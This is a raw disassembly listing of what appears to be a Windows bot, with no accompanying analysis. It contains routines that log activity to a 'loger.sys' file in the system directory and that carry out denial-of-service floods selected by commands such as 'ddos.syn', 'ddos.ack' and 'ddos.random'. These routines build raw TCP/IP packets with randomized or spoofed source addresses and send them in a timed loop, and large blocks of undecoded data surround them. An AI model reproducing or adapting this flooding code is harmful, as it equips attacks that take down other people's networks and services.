dd 59000002h, 0B5FF1375h, 0FFFFFF0Ch, 0FF6650E8h, 0FF5359FFh
dd 42B06815h, 3E86800h, 15FF0000h, 42B014h, 0FB8FE857h
dd 5E5FFFFFh, 74C5835Bh, 4C2C9h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 314h
push esi
lea eax, [ebp-10h]
push eax
call ds:dword_42B0D4 ; GetLocalTime
push 104h
lea eax, [ebp-114h]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
lea eax, [ebp-114h]
push offset asc_433144 ; "\\"
push eax
call sub_41EED0
lea eax, [ebp-114h]
push offset aLoger_sys ; "loger.sys"
push eax
call sub_41EED0
lea eax, [ebp-114h]
push offset aAb ; "ab"
push eax
call sub_41E54E
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_414B81
inc eax
jmp short loc_414BF8
; ---------------------------------------------------------------------------
loc_414B81: ; CODE XREF: seg000:00414B7C�j
push dword ptr [ebp+8]
movzx eax, word ptr [ebp-4]
push eax
movzx eax, word ptr [ebp-6]
push eax
movzx eax, word ptr [ebp-8]
push eax
movzx eax, word ptr [ebp-10h]
push eax
movzx eax, word ptr [ebp-0Ah]
push eax
movzx eax, word ptr [ebp-0Eh]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_41ECA2
push esi
call sub_41E24B
add esp, 28h
cmp dword ptr [ebp+98h], 0
jnz short loc_414BF6
push dword ptr [ebp+8]
lea eax, [ebp-314h]
push offset dword_4350D0
push 200h
push eax
call sub_41E6FE
push 0
push dword ptr [ebp+94h]
lea eax, [ebp-314h]
push eax
lea eax, [ebp+14h]
push eax
push dword ptr [ebp+0Ch]
call sub_40123B
add esp, 24h
loc_414BF6: ; CODE XREF: seg000:00414BBD�j
xor eax, eax
loc_414BF8: ; CODE XREF: seg000:00414B7F�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
aUnlMb_0 db 'Ul$ŒìÜ',8,0 ; DATA XREF: sub_40274D+4202�o
align 2
dw 458Bh
dd 98A5837Ch, 0FFFFF7h, 706583h, 6A575653h, 59F08B25h
dd 0F3987D8Dh, 9080C7A5h, 1000000h, 33000000h, 0FFB9C0h
dd 0BD8D0000h, 0FFFFF79Ch, 15FFABF3h, 4440C0h, 4D8D3C6Ah
dd 8950512Ch, 15FF6C45h, 4440B0h, 200BBh, 0FF086A00h, 42B01415h
dd 0C015FF00h, 3B004440h, 72746C45h, 4D8D3C6Ah, 8950512Ch
dd 15FF6C45h, 4440B0h, 502C458Dh, 0FD98858Dh, 8D50FFFFh
dd 0FFFB9885h, 512C68FFh, 0E8500043h, 9A12h, 84EC81h, 256A0000h
dd 98858D59h, 8BFFFFFBh, 98758DFCh, 0E8A5F350h, 0FFFFFE6Ch
dd 70458953h, 0FD98858Dh, 6AFFFFh, 992EE850h, 0C4810000h
dd 0A4h, 98858D53h, 6AFFFFFBh, 19E85000h, 83000099h, 45C70CC4h
dd 441ACC7Ch, 0FF106A00h, 44422C15h, 0F0BF0F00h, 8B7C458Bh
dd 0FF57FC78h, 4440A015h, 79E48400h, 0FF146A7Bh, 44422C15h
dd 0C0856600h, 0FE831F74h, 831A7EFFh, 157E40FFh, 7D5BFF83h
dd 0BD84C710h, 0FFFFF798h, 1, 174E9h, 0FF146A00h, 44422C15h
dd 0C0856600h, 0F6851E74h, 0FF832E7Dh, 83157E40h, 107D5BFFh
dd 98BD84C7h, 2FFFFF7h, 0E9000000h, 149h, 107DF685h, 98BD84C7h
dd 3FFFFF7h, 0E9000000h, 135h, 98BD84C7h, 4FFFFF7h, 0E9000000h
dd 125h, 98BD848Dh, 8BFFFFF7h, 0FF68530h, 11484h, 208300h
dd 0FD98858Dh, 0E850FFFFh, 9428h, 5908FF83h, 8D8D1075h
dd 0FFFFFD98h, 804C649h, 0EFE900h, 0B93D0000h, 76000001h
dd 0C015FF25h, 6A004440h, 2C4D8D3Ch, 15FF5051h, 4440B0h
dd 502C458Dh, 0FD98858Dh, 6850FFFFh, 435114h, 0FF8341EBh
dd 8C850F0Dh, 8D000000h, 0FFFD9885h, 0D1E850FFh, 85000093h
dd 840F59C0h, 0A5h, 40C015FFh, 3C6A0044h, 512C4D8Dh, 0B015FF50h
dd 8D004440h, 8D502C45h, 0FFFD9885h, 6850FFh, 8D004351h
dd 0FFFB9885h, 7FE850FFh, 81000098h, 84ECh, 59256A00h
dd 0FB98858Dh, 0FC8BFFFFh, 5098758Dh, 0D9E8A5F3h, 53FFFFFCh
dd 8D704589h, 0FFFD9885h, 50006AFFh, 979BE8h, 0A4C48100h
dd 53000000h, 0FB98858Dh, 6AFFFFh, 9786E850h, 0C4830000h
dd 832EEB0Ch, 147401FEh, 7403FE83h, 2FE830Fh, 0FE830574h
dd 0FF1A7504h, 7EB7C75h, 837C458Bh, 8D5007C0h, 0FFFD9885h
dd 35E850FFh, 590000A0h, 7C458359h, 7C7D8114h, 4421FCh
dd 0FE338C0Fh, 7D83FFFFh, 840F0070h, 0FFFFFD9Dh, 0E89C75FFh
dd 0FFFF6289h, 0FF006A59h, 42B06815h
db 0, 0CCh
word_414ECA dw 0B855h ; DATA XREF: sub_40274D+3E38�o
dd 102B4h, 8C246C8Dh, 9B47E8h, 7C558B00h, 6A575653h, 0C0335925h
dd 8DF28B40h, 0A5F3C07Dh, 4589106Ah, 9082896Ch, 33000000h
dd 58458DF6h, 0EDE85056h, 83000096h, 66560CC4h, 25845C7h
dd 6015FF00h, 0FF004442h, 8966C075h, 0AAE85A45h, 59FFFED4h
dd 7C15FF50h, 56004441h, 26A036Ah, 0FF5C4589h, 44410015h
dd 83D88B00h, 5D89FFFBh, 0FF547570h, 4441C415h, 858D5000h
dd 0FFFFFDC0h, 43523468h, 4FE85000h, 83000097h, 75390CC4h
dd 561A754Ch, 8D4875FFh, 0FFFDC085h, 458D50FFh, 75FF50C4h
dd 0C2C5E8C0h, 0C483FFFEh, 0C0858D14h, 50FFFFFDh, 2DEBE8h
dd 4475FF00h, 0FF61BCE8h, 2E959FFh, 8B000002h, 0C0694445h
dd 234h, 44F49889h, 106A0044h, 5058458Dh, 0E415FF53h, 83004441h
dd 2975FFF8h, 41C415FFh, 68500044h, 435208h, 0FDC0858Dh
dd 0E850FFFFh, 96DAh, 390CC483h, 850F4C75h, 1A1h, 182E9h
dd 8D565600h, 56505445h, 8D046A56h, 68506C45h, 98000001h
dd 0E015FF53h, 83004441h, 0E75FFF8h, 41C415FFh, 68500044h
dd 4351D8h, 0FFBFB6EBh, 0E90000FFh, 0FCh, 0FDC9BD80h, 0F06FFFEh
dd 0EF85h, 0E1BD8000h, 18FFFEFDh, 0FDCC858Bh, 4589FFFEh
dd 0D9850F68h, 8D000000h, 0FEFDE885h, 51CC68FFh, 0E8500043h
dd 0A048h, 5959C085h, 0BE850Fh, 858D0000h, 0FFFEFDE8h
dd 4351BC68h, 2DE85000h, 850000A0h, 0F5959C0h, 0A385h
dd 2248B800h, 0DB330044h, 507C4589h, 0FDE8858Dh, 0E850FFFEh
dd 0A00Ch, 5959C085h, 83430C75h, 8B187C45h, 0E3757C45h
dd 858D77EBh, 0FFFEFDE8h, 0D4B5FF50h, 0FFFFFEFDh, 44420015h
dd 0C0B70F00h, 6875FF50h, 418815FFh, 8D500044h, 48B5B04h
dd 44225CC5h, 8534FF00h, 442238h, 0FDC0858Dh, 8868FFFFh
dd 68004351h, 200h, 9620E850h, 0C4830000h, 4C75391Ch, 0FF561A75h
dd 858D4875h, 0FFFFFDC0h, 0C4458D50h, 0C075FF50h, 0FEC13EE8h
dd 14C483FFh, 0FDC0858Dh, 0E850FFFFh, 2C64h, 705D8B59h
dd 0C0858D57h, 56FFFEFDh, 94D2E850h, 0C4830000h, 8D57560Ch
dd 0FEFDC085h, 0FF5350FFh, 44406415h, 0FFF88300h, 0FEDA850Fh
dd 15FFFFFFh, 4441C4h, 515C6850h, 858D0043h, 0FFFFFDC0h
dd 20068h, 0A7E85000h, 83000095h, 753910C4h, 561A754Ch
dd 8D4875FFh, 0FFFDC085h, 458D50FFh, 75FF50C4h, 0C0C5E8C0h
dd 0C483FFFEh, 0C0858D14h, 50FFFFFDh, 2BEBE8h, 0FF535900h
dd 44421815h, 4475FF00h, 0FF5FB4E8h, 0FF5659FFh, 42B06815h
dd 8B56CC00h, 68082474h, 4352D8h, 9EE2E856h, 0C0850000h
dd 4745959h, 0C35EC032h, 43C0C868h, 0CDE85600h, 8500009Eh
dd 755959C0h, 52CC68EBh, 0E8560043h, 9EBCh, 5959C085h
dd 0C068DA75h, 56004352h, 9EABE8h, 59C08500h, 68C97559h
dd 4352B8h, 9E9AE856h, 0C0850000h, 4745959h, 0C35E01B0h
dd 4352B068h, 85E85600h, 8500009Eh, 755959C0h, 52A868EBh
dd 0E8560043h, 9E74h, 5959C085h, 0A068DA75h, 56004352h
dd 9E63E8h, 59C08500h, 68C97559h, 435298h, 9E52E856h, 0C0850000h
dd 0B8755959h, 43529068h, 41E85600h, 8500009Eh, 755959C0h
dd 528868A7h, 0E8560043h, 9E30h, 5959C085h, 80689675h
dd 56004352h, 9E1FE8h, 59C08500h, 68857559h, 435278h, 9E0EE856h
dd 0C0850000h, 850F5959h, 0FFFFFF70h, 43526C68h, 0F9E85600h
dd 8500009Dh, 0F5959C0h, 0FFFF5B85h, 526068FFh, 0E8560043h
dd 9DE4h, 0C0855959h, 5EC0950Fh, 748B56C3h, 18680824h
dd 56004353h, 9DCBE8h, 59C08500h, 32047459h, 68C35EC0h
dd 43C0C8h, 9DB6E856h, 0C0850000h, 0EB755959h, 43531068h
dd 0A5E85600h, 8500009Dh, 745959C0h, 5E01B004h, 530868C3h
dd 0E8560043h, 9D90h, 5959C085h, 68EB75h, 56004353h, 9D7FE8h
dd 59C08500h, 68DA7559h, 4352E4h, 9D6EE856h, 59590000h
dd 950FC085h, 56C35EC0h, 824748Bh, 43534468h, 55E85600h
dd 8500009Dh, 745959C0h, 5EC03204h, 0C0C868C3h, 0E8560043h
dd 9D40h, 5959C085h, 868EB75h, 56004353h, 9D2FE8h, 59C08500h
dd 68DA7559h, 43533Ch, 9D1EE856h, 0C0850000h, 4745959h
dd 0C35E01B0h, 43533468h, 9E85600h, 8500009Dh, 755959C0h
dd 532C68EBh, 0E8560043h, 9CF8h, 5959C085h, 2468DA75h
dd 56004353h, 9CE7E8h, 85595900h, 0C0950FC0h, 8B56C35Eh
dd 68082474h, 435384h, 9CCEE856h, 0C0850000h, 4745959h
dd 0C35EC032h, 43C0C868h, 0B9E85600h, 8500009Ch, 755959C0h
dd 537C68EBh, 0E8560043h, 9CA8h, 5959C085h, 1B00474h, 7468C35Eh
dd 56004353h, 9C93E8h, 59C08500h, 68EB7559h, 435368h, 9C82E856h
dd 0C0850000h, 0DA755959h, 43535C68h, 71E85600h, 8500009Ch
dd 755959C0h, 535068C9h, 0E8560043h, 9C60h, 0C0855959h
dd 5EC0950Fh, 748B56C3h, 0C0680824h, 56004353h, 9C47E8h
dd 59C08500h, 32047459h, 68C35EC0h, 43C0C8h, 9C32E856h
dd 0C0850000h, 0EB755959h, 4353B068h, 21E85600h, 8500009Ch
dd 745959C0h, 5E01B004h, 539C68C3h, 0E8560043h, 9C0Ch
dd 5959C085h, 9068EB75h, 56004353h, 9BFBE8h, 85595900h
dd 0C0950FC0h
db 5Eh, 0C3h
word_41549E dw 0B855h ; DATA XREF: sub_40274D+3F80�o
dd 113B8h, 8C246C8Dh, 9573E8h, 7C458B00h, 6A575653h, 0F08B5925h
dd 0F3BC7D8Dh, 6AF633A5h, 0B089463Fh, 90h, 3359DB33h, 0BC9D88C0h
dd 8DFFFFFCh, 0FFFCBDBDh, 66ABF3FFh, 0FF68ABh, 858D0000h
dd 0FFFFFCBCh, 45C76650h, 66000254h, 89565D89h, 15FF585Dh
dd 444220h, 0FCBC858Dh, 0FF50FFFFh, 44416815h, 48BF0F00h
dd 0C408B0Ah, 8D30FF51h, 0E8506C45h, 9EE4h, 836C458Bh
dd 6A530CC4h, 89026A03h, 15FF5845h, 444100h, 0FF83F88Bh
dd 647D89FFh, 5E5F0C75h, 835BC033h, 0C2C974C5h, 106A0004h
dd 5054458Dh, 0E415FF57h, 83004441h, 2275FFF8h, 41C415FFh
dd 8D500044h, 0FFFDBC85h, 550868FFh, 0E8500043h, 9136h
dd 390CC483h, 5E75485Dh, 535342EBh, 5050458Dh, 46A5353h
dd 5068458Dh, 168h, 75895798h, 0E015FF68h, 83004441h, 5E75FFF8h
dd 41C415FFh, 8D500044h, 0FFFDBC85h, 54D868FFh, 0E8500043h
dd 90F2h, 390CC483h, 1A75485Dh, 4475FF53h, 0FDBC858Dh
dd 8D50FFFFh, 0FF50C045h, 68E8BC75h, 83FFFEBCh, 858D14C4h
dd 0FFFFFDBCh, 278EE850h, 57590000h, 421815FFh, 75FF0044h
dd 5B57E840h, 5359FFFFh, 0B06815FFh, 0BE0042h, 0BF000002h
dd 0FFFFh, 0BC858D57h, 53FFFEECh, 8FDEE850h, 0C4830000h
dd 8D57530Ch, 0FEECBC85h, 75FF50FFh, 6415FF64h, 80004440h
dd 0FEECC5BDh, 0CF7506FFh, 0ECD0B5FFh, 15FFFFFEh, 42B1D8h
dd 0ECD2B5FFh, 0B70FFFFEh, 0D815FFF8h, 830042B1h, 0B70F6EFFh
dd 7C4589C0h, 0FF83A974h, 83A47419h, 9F746EF8h, 7419F883h
dd 0C8858B9Ah, 50FFFEECh, 4D5270A3h, 0DC15FF00h, 500042B1h
dd 0ECBC858Dh, 4068FFFFh, 500042B6h, 901DE8h, 0CC858B00h
dd 83FFFEECh, 0A3500CC4h, 4D5270h, 0B1DC15FFh, 8D500042h
dd 0FFF4BC85h, 0B64068FFh, 0E8500042h, 8FF6h, 0ECE8858Dh
dd 8950FFFEh, 1E8705Dh, 8300008Bh, 0C08510C4h, 458B2F7Eh
dd 5848D70h, 0FFFEECE8h, 750D3880h, 2000C603h, 750A3880h
dd 2000C603h, 8D7045FFh, 0FEECE885h, 0D1E850FFh, 3900008Ah
dd 7C597045h, 50FF83D1h, 92840Fh, 7D830000h, 840F507Ch
dd 88h, 0ECE8858Dh, 0E850FFFEh, 0FFFFFA8Ah, 8D59C084h
dd 0FEECE885h, 1C7450FFh, 8D7C75FFh, 0FFF4BC85h, 8D5750FFh
dd 0FFECBC85h, 0A46850FFh, 0E9004354h, 83h, 0FFFB74E8h
dd 59C084FFh, 0ECE8858Dh, 7450FFFEh, 7C75FF19h, 0F4BC858Dh
dd 5750FFFFh, 0ECBC858Dh, 6850FFFFh, 435470h, 0C0E859EBh
dd 84FFFFFBh, 207459C0h, 0ECE8858Dh, 0FF50FFFEh, 858D7C75h
dd 0FFFFF4BCh, 858D5750h, 0FFFFECBCh, 543C6850h, 2FEB0043h
dd 0ECE8858Dh, 0E850FFFEh, 0FFFFFC16h, 8D59C084h, 0FEECE885h
dd 4F7450FFh, 8D7C75FFh, 0FFF4BC85h, 8D5750FFh, 0FFECBC85h
dd 46850FFh, 8D004354h, 0FFFDBC85h, 0E85056FFh, 8F32h
dd 3920C483h, 850F485Dh, 0FFFFFE27h, 4475FF53h, 0FDBC858Dh
dd 8D50FFFFh, 0FF50C045h, 4CE8BC75h, 83FFFEBAh, 8E914C4h
dd 0E8FFFFFEh, 0FFFFFC3Dh, 0F59C084h, 0FFFDFA84h, 0E8858DFFh
dd 50FFFEECh, 8D7C75FFh, 0FFF4BC85h, 8D5750FFh, 0FFECBC85h
dd 0CC6850FFh, 0EB004353h
db 9Ah
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_415825 proc near ; CODE XREF: sub_415B7C+40�p
var_288 = byte ptr -288h
var_F8 = byte ptr -0F8h
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = dword ptr -0B4h
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_94 = byte ptr -94h
var_88 = byte ptr -88h
var_80 = byte ptr -80h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 288h
push ebx
push edi
push 0Eh
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_A8], bl
lea edi, [ebp+64h+var_A7]
rep stosd
stosw
stosb
lea eax, [ebp+64h+var_288]
push eax
push 202h
call ds:dword_444110 ; WSAStartup
test eax, eax
jz short loc_415861
xor eax, eax
jmp loc_415B75
; ---------------------------------------------------------------------------
loc_415861: ; CODE XREF: sub_415825+33�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_444074 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+64h+var_18], eax
jz loc_415B6D
push 4
lea ecx, [ebp+64h+var_44]
push ecx
push 2
push ebx
push eax
mov [ebp+64h+var_44], edi
call ds:dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_415B64
push esi
push [ebp+64h+arg_C]
mov [ebp+64h+var_B8], 2
call ds:dword_444260 ; htons
mov esi, [ebp+64h+arg_0]
push 28h
mov [ebp+64h+var_B6], ax
mov [ebp+64h+var_B4], esi
mov [ebp+64h+var_2C], 45h
call ds:dword_444260 ; htons
push [ebp+64h+arg_C]
mov [ebp+64h+var_2A], ax
mov [ebp+64h+var_28], di
mov [ebp+64h+var_26], bx
mov [ebp+64h+var_24], 80h
mov [ebp+64h+var_23], 6
mov [ebp+64h+var_22], bx
mov [ebp+64h+var_1C], esi
call ds:dword_444260 ; htons
mov [ebp+64h+var_12], ax
call sub_41ECDE
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_444260 ; htons
push 12345678h
mov [ebp+64h+var_14], ax
call ds:dword_444234 ; htonl
push offset aDdos_syn ; "ddos.syn"
push [ebp+64h+arg_8]
mov [ebp+64h+var_10], eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_415931
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 2
jmp short loc_415985
; ---------------------------------------------------------------------------
loc_415931: ; CODE XREF: sub_415825+101�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+64h+arg_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_41594D
mov [ebp+64h+var_C], ebx
mov [ebp+64h+var_7], 10h
jmp short loc_415985
; ---------------------------------------------------------------------------
loc_41594D: ; CODE XREF: sub_415825+11D�j
push offset aDdos_random ; "ddos.random"
push [ebp+64h+arg_8]
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_415985
call sub_41ECDE
cdq
push 3
pop ecx
idiv ecx
mov [ebp+64h+var_C], edx
call sub_41ECDE
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+64h+var_7], dl
loc_415985: ; CODE XREF: sub_415825+10A�j
; sub_415825+126�j ...
push 4000h
mov [ebp+64h+var_8], 50h
call ds:dword_444260 ; htons
mov [ebp+64h+var_6], ax
lea eax, [ebp+64h+var_6C]
push eax
mov [ebp+64h+var_2], bx
mov [ebp+64h+var_30], ebx
call ds:dword_42B0DC ; QueryPerformanceFrequency
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
push [ebp+64h+var_68]
mov eax, [ebp+64h+arg_10]
push [ebp+64h+var_6C]
cdq
push edx
push eax
call sub_420750
add eax, [ebp+64h+var_38]
mov [ebp+64h+var_4], bx
adc edx, [ebp+64h+var_34]
mov [ebp+64h+var_40], eax
mov [ebp+64h+var_3C], edx
call sub_41ECDE
cdq
mov ecx, 3E9h
idiv ecx
mov edi, 3E8h
add edx, edi
push edx
call ds:dword_444260 ; htons
mov [ebp+64h+var_14], ax
call sub_41ECDE
call sub_41ECDE
push eax
call ds:dword_444260 ; htons
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call ds:dword_444234 ; htonl
push 14h
pop esi
jmp short loc_415A7D
; ---------------------------------------------------------------------------
loc_415A18: ; CODE XREF: sub_415825+30C�j
add [ebp+64h+var_30], eax
lea eax, [ebp+64h+var_38]
push eax
call ds:dword_42B0D8 ; QueryPerformanceCounter
mov eax, [ebp+64h+var_34]
cmp eax, [ebp+64h+var_3C]
jg loc_415B60
jl short loc_415A3F
mov eax, [ebp+64h+var_38]
cmp eax, [ebp+64h+var_40]
jnb loc_415B60
loc_415A3F: ; CODE XREF: sub_415825+20C�j
mov [ebp+64h+var_4], bx
call sub_41ECDE
cdq
mov ecx, 3E9h
idiv ecx
add edx, edi
push edx
call ds:dword_444260 ; htons
mov [ebp+64h+var_14], ax
call sub_41ECDE
call sub_41ECDE
push eax
call ds:dword_444260 ; htons
push [ebp+64h+arg_4]
movzx eax, ax
mov [ebp+64h+var_10], eax
call ds:dword_444234 ; htonl
loc_415A7D: ; CODE XREF: sub_415825+1F1�j
inc [ebp+64h+arg_4]
mov [ebp+64h+var_20], eax
mov eax, [ebp+64h+var_1C]
push esi
mov [ebp+64h+var_60], eax
mov [ebp+64h+var_5C], bl
mov [ebp+64h+var_5B], 6
call ds:dword_444260 ; htons
mov [ebp+64h+var_5A], ax
mov eax, [ebp+64h+var_20]
mov [ebp+64h+var_64], eax
lea eax, [ebp+64h+var_64]
push 20h
push eax
lea eax, [ebp+64h+var_A8]
push eax
call sub_41F400
lea eax, [ebp+64h+var_14]
push esi
push eax
lea eax, [ebp+64h+var_88]
push eax
call sub_41F400
lea eax, [ebp+64h+var_A8]
push 34h
push eax
call sub_402422
mov [ebp+64h+var_4], ax
lea eax, [ebp+64h+var_2C]
push esi
push eax
lea eax, [ebp+64h+var_A8]
push eax
call sub_41F400
lea eax, [ebp+64h+var_14]
push esi
push eax
lea eax, [ebp+64h+var_94]
push eax
call sub_41F400
push 4
lea eax, [ebp+64h+var_80]
push ebx
push eax
call sub_41E5F0
add esp, 44h
lea eax, [ebp+64h+var_A8]
push 28h
push eax
call sub_402422
mov [ebp+64h+var_22], ax
lea eax, [ebp+64h+var_2C]
push esi
push eax
lea eax, [ebp+64h+var_A8]
push eax
call sub_41F400
add esp, 14h
push 10h
lea eax, [ebp+64h+var_B8]
push eax
push ebx
push 28h
lea eax, [ebp+64h+var_A8]
push eax
push [ebp+64h+var_18]
call ds:dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_415A18
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+64h+var_F8]
push offset dword_435534
push eax
call sub_41E6A6
lea eax, [ebp+64h+var_F8]
push eax
call sub_417D70
add esp, 10h
jmp short loc_415B63
; ---------------------------------------------------------------------------
loc_415B60: ; CODE XREF: sub_415825+206�j
; sub_415825+214�j
mov ebx, [ebp+64h+var_30]
loc_415B63: ; CODE XREF: sub_415825+339�j
pop esi
loc_415B64: ; CODE XREF: sub_415825+73�j
push [ebp+64h+var_18]
call ds:dword_444218 ; closesocket
loc_415B6D: ; CODE XREF: sub_415825+57�j
call ds:dword_444224 ; WSACleanup
mov eax, ebx
loc_415B75: ; CODE XREF: sub_415825+37�j
pop edi
pop ebx
add ebp, 64h
leave
retn
sub_415825 endp
; =============== S U B R O U T I N E =======================================
sub_415B7C proc near ; CODE XREF: seg000:00415C27�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_4022BD
push [esp+10h+arg_4]
mov esi, eax
call sub_41E7AD
push [esp+14h+arg_C]
mov ebx, eax
call sub_41E7AD
mov edi, eax
call sub_41ECDE
cdq
mov ecx, 200h
idiv ecx
push edi
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_415825
add esp, 20h
test eax, eax
jnz short loc_415BC9
inc eax
loc_415BC9: ; CODE XREF: sub_415B7C+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_415B7C endp
; ---------------------------------------------------------------------------
loc_415BD8: ; DATA XREF: sub_40274D+6235�o
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+8]
push esi
push edi
mov esi, eax
mov ecx, 0A5h
lea edi, [ebp-294h]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
lea eax, [ebp-18Ch]
push eax
lea eax, [ebp-8Ch]
push eax
lea eax, [ebp-20Ch]
push eax
lea eax, [ebp-28Ch]
push eax
call sub_415B7C
push eax
lea eax, [ebp-494h]
push offset unk_435550
push eax
call sub_41E6A6
xor esi, esi
add esp, 20h
cmp [ebp-8], esi
jnz short loc_415C68
push esi
push dword ptr [ebp-0Ch]
lea eax, [ebp-494h]
push eax
lea eax, [ebp-10Ch]
push eax
push dword ptr [ebp-294h]
call sub_40123B
add esp, 14h
loc_415C68: ; CODE XREF: seg000:00415C46�j
lea eax, [ebp-494h]
push eax
call sub_417D70
push dword ptr [ebp-290h]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
loc_415C89: ; DATA XREF: sub_40274D+642D�o
push ebp
lea ebp, [esp-74h]
sub esp, 3BCh
mov eax, [ebp+7Ch]
push ebx
push esi
push edi
push 68h
pop ecx
push 0FFh
mov esi, eax
xor ebx, ebx
push 3
lea edi, [ebp-148h]
rep movsd
inc ebx
push 2
mov [eax+19Ch], ebx
call ds:dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+70h], eax
jnz short loc_415CF2
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp-348h]
push offset dword_43565C
push eax
call sub_41E6A6
add esp, 0Ch
xor edi, edi
loc_415CE4: ; CODE XREF: seg000:00415D27�j
; seg000:00415D4E�j ...
cmp [ebp+50h], edi
jnz loc_415F2D
jmp loc_415F10
; ---------------------------------------------------------------------------
loc_415CF2: ; CODE XREF: seg000:00415CC5�j
push 4
lea ecx, [ebp+68h]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+68h], ebx
call ds:dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_415D29
call ds:dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp-348h]
push offset unk_43562C
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_415CE4
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: seg000:00415D0A�j
lea eax, [ebp-144h]
push eax
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_415D50
lea eax, [ebp-348h]
push offset unk_43560C
push eax
call sub_41E6A6
pop ecx
pop ecx
jmp short loc_415CE4
; ---------------------------------------------------------------------------
loc_415D50: ; CODE XREF: seg000:00415D39�j
push 10h
lea eax, [ebp+58h]
push edi
push eax
call sub_41E5F0
add esp, 0Ch
push edi
mov word ptr [ebp+58h], 2
call ds:dword_444260 ; htons
mov [ebp+5Ah], ax
lea eax, [ebp-144h]
push eax
call ds:dword_44417C ; inet_addr
mov esi, ds:dword_42B038
mov [ebp+5Ch], eax
mov [ebp+7Ch], edi
call esi ; GetTickCount
mov [ebp+6Ch], eax
jmp loc_415EB1
; ---------------------------------------------------------------------------
loc_415D93: ; CODE XREF: seg000:00415EC2�j
push 41Ch
mov ds:byte_4D5278, 45h
call ds:dword_444260 ; htons
cmp [ebp+48h], edi
mov ds:word_4D527A, ax
mov ds:word_4D527C, bx
mov ds:word_4D527E, di
mov ds:byte_4D5280, 80h
mov ds:byte_4D5281, bl
mov ds:word_4D5282, di
jz short loc_415E02
call sub_41ECDE
mov ebx, eax
shl ebx, 8
call sub_41ECDE
add ebx, eax
shl ebx, 8
call sub_41ECDE
add ebx, eax
shl ebx, 8
call sub_41ECDE
add ebx, eax
mov ds:dword_4D5284, ebx
xor ebx, ebx
inc ebx
jmp short loc_415E1A
; ---------------------------------------------------------------------------
loc_415E02: ; CODE XREF: seg000:00415DD0�j
push dword ptr [ebp-148h]
call sub_4023C9
pop ecx
push eax
call ds:dword_44417C ; inet_addr
mov ds:dword_4D5284, eax
loc_415E1A: ; CODE XREF: seg000:00415E00�j
mov eax, [ebp+5Ch]
mov ds:dword_4D5288, eax
call sub_41ECDE
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4D528C, dl
call sub_41ECDE
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4D528D, dl
call sub_41ECDE
cdq
mov ecx, 0F0h
idiv ecx
push 400h
mov ds:word_4D528E, di
mov ds:word_4D5292, bx
inc edx
mov ds:word_4D5290, dx
call sub_41ECDE
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_4D5294
call sub_41E5F0
add esp, 0Ch
push 10h
